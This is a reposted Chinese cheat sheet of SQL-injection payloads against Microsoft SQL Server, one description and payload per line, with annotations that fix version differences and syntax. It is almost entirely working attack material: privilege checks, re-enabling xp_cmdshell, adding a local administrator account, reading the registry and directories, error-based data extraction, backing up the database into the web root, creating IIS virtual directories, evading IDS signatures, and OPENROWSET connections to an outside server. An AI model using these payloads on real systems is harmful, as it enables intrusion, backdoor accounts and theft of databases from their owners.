
[转载]SQL注入命令全集精华

[转载]SQL注入命令全集精华

信息来源:邪恶八进制信息安全团队(www.eviloctal.com)。以下各行格式为「说明|注入载荷」，载荷均针对 MSSQL（大部分写法以 SQL Server 2000 为前提，2005 及以上版本的差异在对应行注明）。

检测权限 sysadmin|and 1=(select IS_SRVROLEMEMBER('sysadmin'))
检测权限 serveradmin|and 1=(select IS_SRVROLEMEMBER('serveradmin'))
检测权限 setupadmin|and 1=(select IS_SRVROLEMEMBER('setupadmin'))
检测权限 securityadmin|and 1=(select IS_SRVROLEMEMBER('securityadmin'))
检测权限 diskadmin|and 1=(select IS_SRVROLEMEMBER('diskadmin'))
检测权限 bulkadmin|and 1=(select IS_SRVROLEMEMBER('bulkadmin'))
检测权限 db_owner（db_owner 是数据库角色而非服务器角色，IS_SRVROLEMEMBER 会返回 NULL，应改用 IS_MEMBER）|and 1=(select IS_MEMBER('db_owner'))
====================|
检测 xp_cmdshell (CMD命令；注意此查询只说明过程存在，SQL 2005+ 默认禁用，需 sp_configure 'xp_cmdshell',1 开启后才能调用)|and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_cmdshell')
检测 xp_regread (注册表读取功能)|and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_regread')
检测 sp_makewebtask (把查询结果写成 HTML 文件，可用来向 web 目录写文件，并非备份功能；SQL 2005 起已移除)|and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'sp_makewebtask')
检测 sp_addextendedproc|and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'sp_addextendedproc')
检测 xp_subdirs 读子目录|and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_subdirs')
检测 xp_dirtree 读子目录|and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_dirtree')
====================|
修改内容（where 1=1 会更新整表所有行，请换成能定位目标行的条件）|; UPDATE 表名 set 字段=内容 where 1=1
====================|
XP_CMDSHELL检测|;exec master..xp_cmdshell 'dir c:\'
恢复 XP_CMDSHELL（仅适用于 SQL 2000 中被 sp_dropextendedproc 删除的情况；2005+ 应使用 sp_configure 'show advanced options',1;reconfigure;sp_configure 'xp_cmdshell',1;reconfigure）|;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
用 XP_CMDSHELL 添加用户 paf（命令以 SQL Server 服务账号身份运行，该账号需有本机管理员权限才能添加用户）|;exec master.dbo.xp_cmdshell 'net user paf pafpaf /add'
XP_CMDSHELL把用户加到admin组 paf|;exec master.dbo.xp_cmdshell 'net localgroup administrators paf /add'
====================|
创建表 ddd|;create table [dbo].[ddd] ([dstr][char](255));
检测表段 ddd|and exists (select * from ddd)
读取WEB的位置 (读注册表；ControlSet001 不一定是当前生效的控制集，更稳妥的是 SYSTEM\CurrentControlSet\...；该键由 IIS 4/5 维护，IIS 6+ 配置存于 metabase，此键可能不存在)|;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/',@result output insert into ddd (dstr) values(@result);--
爆出WEB的绝对路径(显错模式：dstr > 1 会把字符串隐式转换成 int，转换失败的错误信息中带出 dstr 的值，因此需要页面回显数据库错误)|and 1=(select count(*) from ddd where dstr > 1)
删除表 ddd|;drop table ddd;--
====================|
创建查看目录的表 dirs|;create table dirs(paths varchar(100), id int)
把查看目录的内容加入表 dirs 'c:\'|;insert dirs exec master.dbo.xp_dirtree 'c:\'
爆目录的内容 dirs（同样靠类型转换报错回显；top 1 不带 order by 每次只能得到一条任意行，逐条枚举时需加 where paths not in ('已得到的值') 排除）|and 0<>(select top 1 paths from dirs)
备份数据库到 web 目录（原文 "backup 数据库名" 是翻译残留，正确关键字为 backup database；备份文件包含整库内容，可能很大，且 web 目录须对服务账号可写）|;declare @a sysname; set @a=db_name();backup database @a to disk='c:\inetpub\wwwroot\down.bak';--
删除表 dirs|;drop table dirs;--
====================|
创建表 temp|;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
把驱动盘列表加入 temp 表|;insert temp exec master.dbo.xp_availablemedia;--
清空表 temp（delete 只删除行，表本身仍在；要删除表请用 ;drop table temp;--）|;delete from temp;--
====================|
创建表 dirs|;create table dirs(paths varchar(100), id int);--
获得子目录列表 xp_subdirs|;insert dirs exec master.dbo.xp_subdirs 'c:\';--
爆出内容(显错模式；top 1 每次只回显一条，逐条枚举需用 not in 排除已得到的行)|and 0<>(select top 1 paths from dirs)
清空表 dirs（delete 只删行不删表；若不 drop，下一节的 create table dirs 会因表已存在而失败，应改用 ;drop table dirs;--）|;delete from dirs;--
====================|
创建表 dirs|;create table dirs(paths varchar(100), id int)--
用 xp_cmdshell 查看目录内容（xp_cmdshell 只返回一列 output，而 dirs 有两列，直接 insert dirs exec 会因列数不匹配报错，需指定列名；dir 输出行超过 100 字符时 varchar(100) 也会截断报错）|;insert dirs(paths) exec master..xp_cmdshell 'dir c:\'
清空表dirs（delete 只删行；删除表本身请用 ;drop table dirs;--）|;delete from dirs;--
====================|
检测 SP_OAcreate (OLE 自动化执行命令；sysobjects 中名称为 sp_OACreate，此查询依赖不区分大小写的排序规则；SQL 2005+ 默认禁用，需 sp_configure 'Ole Automation Procedures',1 开启)|and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'SP_OAcreate')
执行CMD命令 SP_OAcreate（C:\WINNT 是 NT4/2000 的系统目录，XP/2003 及以后为 C:\Windows\system32，按目标系统调整路径）|;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add'
建目录 SP_OAcreate（系统目录路径同上，按目标系统调整）|;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c md c:\inetpub\wwwroot\1111'
创建一个虚拟目录E盘（mkwebdir.vbs 是 IIS 自带管理脚本，默认位于 C:\Inetpub\AdminScripts 而非 wwwroot，路径按实际情况调整；"默认 Web 站点" 是中文 IIS 的站点名，英文系统为 "Default Web Site"）|;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认 Web 站点" -v "e","e:\"'
设置虚拟目录为可读 e（chaccess.vbs 同样默认在 C:\Inetpub\AdminScripts；w3svc/1 是第一个站点的 metabase 路径，站点编号按实际调整）|;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'
启动 server 服务（即 LanmanServer 文件共享服务；xp_servicecontrol 是未公开的扩展存储过程）|;exec master..xp_servicecontrol 'start', 'server'
绕过IDS的检测的 xp_cmdshell（拼接过程名后再 exec，只能躲过匹配字面量 xp_cmdshell 的签名，数据库端日志仍会记录实际调用）|;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
通过 OPENROWSET 连接远程数据库1（让目标库主动连接 servername 并执行查询；servername、sa 口令 apachy_123 和 table1 均为示例值；SQL 2005+ 需先开启 'Ad Hoc Distributed Queries'）|; select * from OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=apachy_123', 'select * from table1' )
通过 OPENROWSET 连接远程数据库2（Network=DBMSSOCN 表示走 TCP/IP，Address 为目标地址:端口，此处为示例值；原文缺少结尾的右括号，已补上）|;select * from OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from table')
www.dirshell.com/thenines
